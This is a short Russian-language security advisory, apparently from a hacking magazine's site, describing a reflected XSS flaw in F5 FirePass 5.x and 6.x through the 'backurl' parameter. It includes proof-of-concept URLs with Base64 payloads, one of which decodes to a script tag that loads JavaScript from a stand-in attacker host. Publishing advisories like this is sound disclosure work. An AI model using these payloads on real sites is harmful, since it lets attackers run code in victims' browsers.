Хакер #305. Многошаговые SQL-инъекции
Программа:
FirePass 5.x
FirePass 6.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "backurl" сценарием download_plugin.php3. Атакующий может
выполнить произвольный сценарий в браузере жертвы в контексте безопасности
уязвимого сайта.
Примеры:
https://target.tld/download_plugin.php3? js=&backurl=Ij48c2NyaXB0IHNyYz0iaHR0cDovL3d3dy5ldmlsLmZvby94c
3MiPjwvc2NyaXB0PjxhIGhyZWY9Ig==
Полезная нагрузка кодирована в Base64. В данном примере это:
"><script src="http://www.evil.foo/xss"></script><a href="
которая вызывает злонамеренный JavaScript код из стороннего URL ('http://www.evil.foo/xss'
в данном случае), чем доказывается, что скрипт может быть запущен без
ограничений длины или вставки символов.
https://target.tld/download_plugin.php3? js=&backurl=Ij48dGV4dGFyZWE+SFRNTCBpbmplY3Rpb24gd
GVzdDwvdGV4dGFyZWE+PGEgaHJlZj0i
Полезная нагрузка кодирована в Base64. В данном примере это:
"><textarea>HTML injection test</textarea><a href="